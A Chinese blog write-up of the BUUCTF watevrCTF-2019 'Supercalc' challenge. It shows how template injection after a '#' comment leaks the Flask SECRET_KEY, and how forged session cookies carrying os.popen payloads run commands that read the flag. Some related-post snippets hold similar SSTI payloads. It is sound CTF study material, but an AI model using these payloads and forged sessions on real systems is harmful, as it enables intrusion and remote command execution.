BUUCTF [watevrCTF-2019] Supercalc

最新推荐文章于 2024-07-03 18:08:32 发布
最新推荐文章于 2024-07-03 18:08:32 发布
阅读量867 收藏 1
点赞数
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF watevrCTF-2019 Supercalc writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111460870
版权

BUUCTF [watevrCTF-2019] Supercalc

考点:

  1. session伪造
  2. 通过session拼接语句
  3. {{config}}获取SECRET_KEY的值

启动环境:
在这里插入图片描述
是一个类似计算机的功能,又一个输入框,尝试输入1+1
在这里插入图片描述
得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集
HTTP请求中,查看到Cookie信息:
在这里插入图片描述
可以获取到session

session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArIDEifV19.X98yeg.YggVMibcD6Bh8ZqORv4BMRBfNS0

看结构与开头,猜测为Flask的框架,猜测为模版注入
首先使用Python3脚本进行解密:

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

python3 main.py session

得到解密后的结果:
在这里插入图片描述
其解密后的值为之前提交的算式,猜测code中的式子可被执行
使用tplmap检测,但没检测出注入点:
在这里插入图片描述
尝试手工注入:{{7*7}}
在这里插入图片描述
提示应该是不能使用{},继续尝试让程序报错
在输入1/0时,得到报错:
在这里插入图片描述
说明程序对报错应该没有做过滤,尝试输入#(注释)1/0#1+1
在这里插入图片描述
得到报错,式子被成功拼接,在#注释后加上模版语法:

1/0#{{7*7}}

在这里插入图片描述
可以看到模版语法中的式子被成功计算,看看是否能爆出SECRET_KEY的值,查看config

1/0#{{config}}

在这里插入图片描述
得到了SECRET_KEY的值为cded826a1e89925035cc05f0907855f7,满足了加密session的条件
构造本题所需的session

{'history': [{'code': '__import__(/"os/").popen(/"ls/").read()'}]}

执行ls命令,查看当前目录下的文件信息,使用flask-session-cookie加密脚本Github地址

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"ls\").read()'}]}"

:需要将其中的"双引号进行转译
在这里插入图片描述

得到加密后的session

eyJoaXN0b3J5IjpbeyJjb2RlIjoiX19pbXBvcnRfXyhcIm9zXCIpLnBvcGVuKFwibHNcIikucmVhZCgpIn1dfQ.X985cg.ycUIrV_mBlC4eRSuNplU9bUWB88

F12中的Application修改session的值,刷新后的得到回显:
在这里插入图片描述
查看到其中有flag.txt,构造最终payload:

{'history': [{'code': '__import__("os").popen("cat flag.txt").read()'}]}

使用使用flask-session-cookie加密脚本:

python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history': [{'code': '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"

在这里插入图片描述
成功伪造session

eyJoaXN0b3J5IjpbeyJjb2RlIjoiX19pbXBvcnRfXyhcIm9zXCIpLnBvcGVuKFwiY2F0IGZsYWcudHh0XCIpLnJlYWQoKSJ9XX0.X987CQ.gwAnc220B3nh99IVo6gGrJ0StV0

与上一步相同的方法,填入session后刷新页面,得到flag:

在这里插入图片描述

Senimo_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【re】 watevrCTF2019_Repyc
Nothing
12-16 572
这题给了个pyc。先用uncompyle反编译成py。 uncompyle6 3nohtyp.pyc >>sss.py 打开,然后惊了。 # uncompyle6 version 3.6.0 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.8.0 (default, Oct 23 2019, 18:51:26) # ...
说透 CSV 格式
GitChat
10-16 942
CSV 这么简单的格式,需要单独一篇文章来说明吗?其实细节隐藏在魔鬼之中,我们过去的团队在生成 CSV 内容的时候,由于兼容性问题也是吃过苦头的。因此,我觉得还是有必要写一篇文章,从各个方面把这个格式彻底讲透。 本文将介绍: CSV 格式的来源、历史背景和规范化情况; 规范化的 CSV 格式要求与实际支持情况; Python 内置库与第三方库处理 CSV 的接口与细节; 处理 CSV 格式应该注...
BUUCTF--[watevrCTF-2019]Supercalc
qq_46263951的博客
08-12 337
打开页面后发现其功能是进行计算 使用jwt解析可以发现我们所提交的内容在session中 通过1/0进行报错,用#注释来进行绕过, 执行命令可以得到加密session时所需的key 根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本 使用ls命令查看当前目录下的所有文件 python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f09078..
揭秘JWT:从CTF实战到Web开发,py使用JWT令牌验证
最新发布
xt350488的博客
07-03 1153
JWT(JSON Web Tokens)是一种开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在网络上安全地传输信息。这种信息可以验证和信任,因为它是数字签名的。JWT可以使用HMAC算法或者是RSA的公私秘钥对进行签名。:服务器不需要保存会话信息,减轻了服务器负担。:易于在分布式系统中使用,支持跨域身份验证。:通过数字签名确保信息的完整性和来源可信。:由于包含头部、负载和签名,JWT的大小可能相对较大。:每次请求都需要验证JWT,可能会增加服务器的处理时间。
[watevrCTF-2019]Supercalc 1
shinygod的博客
03-02 587
知识点:flask-session伪造*,key值寻找 目录解密:加密伪造:分析解题 解密: exp python3 flask_session.py decode -c '你的session' 加密伪造: python3 flask_session_cookie_manager3.py encode -s "key" -t "{'history':[{'code':'__import__(os).system(\"ls \")'}]}"``` 或者直接用下面的直接构造 from flask.sess
[watevrCTF-2019]Supercalc
snowlyzz的博客
09-02 406
flask_session 伪造
CP-M-for-OS-X:z80仿真器+ CPM-80重新实现,旨在允许在OS X下使用原始CPM软件
02-04
这个项目使得用户能够在现代计算机上运行那些基于古老CP/M平台的经典软件,如Zork、Turbo Pascal、WordStar和Supercalc等。 CP/M(Control Program for Microcomputers)是由Gary Kildall在1974年开发的操作系统,...
漫谈互联网历史【5】- 80年代: 个人电脑的成熟
zrtang的专栏
02-22 1308
【来源】:http://blog.sina.com.cn/s/blog_5e7650d40100caim.html 上次说到,1980年时,IBM找微软开发操作系统。其实IBM早就意识到个人电脑的巨大潜在市场。早在1975年,他们就推出了IBM 5100。但是其高昂的价格(1万美金)无法被个人用户所接受。于是他们启动了一个叫“象棋”(”Project Chess”)的秘密项目,准备研发新一
静态方法不能使用 super 调用父类静态方法
鹏三的博客
04-28 3194
public class SuperCalc { protected static int multily(int a, int b) { return a * b; } }public class SubCalc extends SuperCalc { public static int multiply(int a, int b) { in
java基础知识
02-21
根据提供的文件信息,我们可以归纳总结出以下几个Java基础知识相关的知识点: ...这意味着 `SubCalc` 类中的 `multiply` 方法会先调用 `SuperCalc` 类中的 `multiply` 方法,并获取结果,再进行后续处理。
flask、session、cookie解加密脚本
10-13
flask、session、cookie解加密脚本
[2019watevrCTF]Supercalc wireup
ShenZ的博客
01-19 281
[2019watevrCTF]Supercalc wireup calc!这个界面看着就像ssti <class 'os._wrap_close'>是118个 利用os._wrap_close类中的popen读取目录 ''.__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('ls').read() __import__("os").popen("cat flag.txt").read()
[watevrCTF-2019]Supercalc flask-cookie伪造&SSTI
a3320315的博客
02-12 1959
题目 buu新上的题目,晚上没啥事情就做了一下~~ 打开页面是一个计算器 可以执行一些简单的运算,我们还是老实地按步骤走,先扫下目录,没发现什么东西,然后查看header,源码等,都没有发现思路,然后我们看了一下cookie 这个凭直觉都知道是flask的cooike,然后我们放到脚本里面解一下 这不是我们先前的计算么? 那么思路就很明显了,肯定是伪造cooike,那么我们就不必须拿到key才可...
[watevrCTF-2019]Cookie Store
m0_62905261的博客
07-25 189
[watevrCTF-2019]Cookie Store
CTFbuuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1853
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
weixin_63231007的博客
05-03 779
[护网杯 2018]easy_tornado 1 访问页面所给的可以得到 /flag.txt flag in /fllllllllllllag 可知flag在/fllllllllllllag。 /welcome.txt render /hints.txt md5(cookie_secret+md5(filename)) render不知道是上面意思。看别人题解说:结合题目给的tornado,可以想到SSTI。 render()函数是渲染函数,进行服务器端渲染。所以能想到模板注入 [护网..
BUUCTF web 个人做题记录【6-5】
qq_61620566的博客
06-06 446
buuctf 个人做题笔记,希望对各位和我一样热衷于ctf的道友们有所帮助
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值